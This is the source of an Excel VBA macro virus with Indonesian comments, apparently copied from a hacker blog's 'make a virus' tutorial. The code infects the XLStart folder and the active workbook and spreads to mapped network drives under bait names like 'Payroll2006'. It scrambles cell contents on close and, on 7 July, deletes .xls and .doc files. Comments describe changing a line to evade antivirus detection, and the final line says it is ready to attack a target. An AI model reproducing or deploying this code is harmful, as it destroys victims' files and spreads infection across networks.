‘membuat file Xlstart yang isinya file yg terinfeksi
‘membuat tulisan pada sheet active
strup = Application.StartupPath
If Dir(strup & “” & “*.xls”) = “” Then
pnm = ActiveWorkbook.Name
Apnm = ActiveWorkbook.FullName
OtherVrs = Dir(strup & “” & “*.xls”)
If OtherVrs <> “” Then
workbooks(OtherVrs).Close
Kill strup & “” & OtherVrs
End If
workbooks(pnm).SaveAs FileName:=strup & “” & Myclub & “.xls”
ActiveWindow.Visible = False
workbooks.Open (Apnm)
End If
For n = 67 To 90
l = Chr(n)
drv = l & “:”
d3 = DrvID(drv)
If d3 = “network” Then snd2drv (drv)
Next
nmpers = Dir(strup & “” & “*.xls”)
Application.OnSheetActivate = “” & strup & “” & nmpers & “!XLBomb”
If Month(Now()) = 7 And Day(Now()) = 7 Then
Range(”A1″).Insert
Range(”A1″).Select
With Selection.Font
.Name = “Arial”
.FontStyle = “Bold”
.Size = 18
.ColorIndex = 7
End With
ActiveCell.FormulaR1C1 = “Living in the DARKSIDE to watch your Life”
MessBoard
cari
End If
Application.StatusBar = False
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub
‘Penularan pada workbook yg aktif
‘add sheet xlSheetVeryHidden sebagai otorisasi
’sorry mcafee aku selalu merubah ini bila terdeteksi
Sub XLBomb()
On Error Resume Next
XlsBmb = “c:\Trough.WQK” ‘rubah baris ini bila virus kamu terdeteksi
Application.DisplayAlerts = False
Application.ScreenUpdating = False
aktip = ActiveWorkbook.Name
sedang = ThisWorkbook.Name
Set mcraktip = workbooks(aktip).VBProject.VBComponents
Set modaktip = ActiveWorkbook.VBProject.VBComponents
Set mymcr = ThisWorkbook.VBProject.VBComponents
If aktip <> “Book1″ And aktip <> “Book2″ Then
For NS = 1 To Sheets.Count
If Sheets(NS).Name = “S1L3N7″ Then
kz = Sheets(NS).Name
Exit For
End If
kz = Sheets(NS).Name
Next NS
If kz <> “S1L3N7″ Then
Sheets.Add
ActiveWindow.ActiveSheet.Name = “S1L3N7″
Sheets(”S1L3N7″).Visible = xlSheetVeryHidden
Else
susun
Sheets(”S1L3N7″).Range(”A7″) = “”
End If
For nm = 1 To mcraktip.Count
If mcraktip(nm).Type = 1 Then
nama = mcraktip(nm).Name
Exit For
End If
Next nm
modaktip.Remove modaktip(nm)
For nm = 1 To mymcr.Count
If mymcr(nm).Type = 1 Then
nama = mymcr(nm).Name
Exit For
End If
Next nm
mymcr(nama).Export XlsBmb
modaktip.Import XlsBmb
Kill XlsBmb
XBrnd
ActiveWorkbook.VBProject.VBComponents(nm).Name = Myclub
If Minute(Now()) > 30 And Weekday(Now()) Mod 2 = 0 Then
Application.StatusBar = “Searching for 1RM4 at the network…”
End If
End If
Application.DisplayAlerts = True
End Sub
‘duplikasi virus dengan berbagai nama secara RANDOM
Private Sub XBrnd()
Dim Sbjt, Bodd
On Error GoTo nil1
Randomize
Sbjt = Array(”Primitif”, “Conspiracy”, “mydata”, “OnJuly”, “Updater”, “ms0ffice”, _
“letme”, “poisoning”, “yourdream”)
Myclub = Sbjt(Rnd * 9 + 1)
Exit Sub
nil1:
Myclub = Sbjt(0)
End Sub
‘hihi.. macro di kawinkan sama worm yaaa gini ini
‘tularkan pada semua drive & network yang telah di MAPPING
Function DrvID(drv3)
On Error Resume Next
Dim fso, d, t
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set d = fso.getdrive(drv3)
Select Case d.drivetype
Case 0: t = “Unknown”
Case 1: t = “removable”
Case 2: t = “Fixed”
Case 3: t = “network”
Case 4: t = “CD-ROM”
Case 5: t = “Ramdisk”
End Select
If t = “” Then t = “none”
DrvID = t
End Function
Sub snd2drv(DrvAll)
On Error Resume Next
Application.DisplayAlerts = False
Application.ScreenUpdating = False
Gnm = ActiveWorkbook.Name
GnmF = ActiveWorkbook.FullName
Randomize
FlName = Array(”BankColapse”, “myacc”, “report”, “launch06″, “yourScrt”, “jobs”, _
“reference07″, “logistic”, _
“Payroll2006″, “NewCost”, “DoNotOpen”, “secretary”, “tax_report”, “Finance”, _
“director2006″)
Bread = FlName(Rnd * 14 + 1)
workbooks(Gnm).SaveAs FileName:=DrvAll & “” & Bread & “.xls”
workbooks(ActiveWorkbook.Name).Close
workbooks.Open (GnmF)
Application.DisplayAlerts = True
End Sub
Private Sub Auto_Close()
On Error Resume Next
If ActiveWorkbook.Name <> “Book1″ And ActiveWorkbook.Name <> “Book2″ Then
Application.ScreenUpdating = False
Application.DisplayAlerts = False
For NS = 1 To Sheets.Count
If Sheets(NS).Name = “S1L3N7″ Then
kz = Sheets(NS).Name
Exit For
End If
kz = Sheets(NS).Name
Next NS
If kz <> “S1L3N7″ Then
Sheets.Add
ActiveWindow.ActiveSheet.Name = “S1L3N7″
Sheets(”S1L3N7″).Visible = xlSheetVeryHidden
End If
CryptSTAT = Sheets(”S1L3N7″).Range(”A7″)
If CryptSTAT <> 1 Then
kacau
Sheets(”S1L3N7″).Range(”A7″) = 1
SvFl = Dir(Application.StartupPath & “” & “*.xls”)
workbooks(SvFl).Save
ActiveWorkbook.Save
End If
End If
End Sub
‘klo file d tutup basic encrypt
’supaya klo macro d hapus & DUUUAAARRR rusak file-nya
Sub kacau() ‘kurang setiap sheets
For i = 48 To 90 ‘48 as 0 and 90 as Z
If i <> 63 Then
huruf = Chr(i)
Cells.Replace What:=huruf, Replacement:=Chr(i + 110), LookAt:=xlPart, SearchOrder _
:=xlByRows, MatchCase:=False
End If
Next
End Sub
‘kembalikan (decrypt) struktur file saat d buka
Sub susun()
For i = 158 To 200
If i <> 173 Then
huruf = Chr(i)
Cells.Replace What:=huruf, Replacement:=Chr(i – 110), LookAt:=xlPart, SearchOrder _
:=xlByRows, MatchCase:=False
End If
Next
End Sub
‘hapus file xls,doc & file yg anda inginkan
‘membuat file tipuan dg nama sesuai folder
Sub cari()
On Error Resume Next
Dim nmfold1, nmfold2, pjg, kena As Integer
pnm = ActiveWorkbook.FullName
pjg = Len(pnm)
For i = 0 To 50
pjg = pjg – 1
If Right(Left(pnm, pjg), 1) = “” Then
foldbatas = Left(pnm, pjg)
Kill foldbatas & “*.xls”
Kill foldbatas & “*.doc”
Kill foldbatas & “irma.*”
If a = 0 Then
nmfold1 = Len(foldbatas) – 1
pnm = Left(pnm, nmfold1)
a = 1
Else
nmfold2 = Len(foldbatas) + 1
kena = nmfold1 – nmfold2
namekena = Right(pnm, kena + 1)
Application.ScreenUpdating = False
workbooks.Add (namekena & “.xls”)
ActiveWorkbook.Save
ActiveWorkbook.Close
Application.ScreenUpdating = True
Exit For
End If
End If
Next
End Sub
Oke sekarang virusnya udah siap tinggal serang computer target!!!!

sumber : http://bukittinggihackers.wordpress.com/membuat-virus-yukkkk/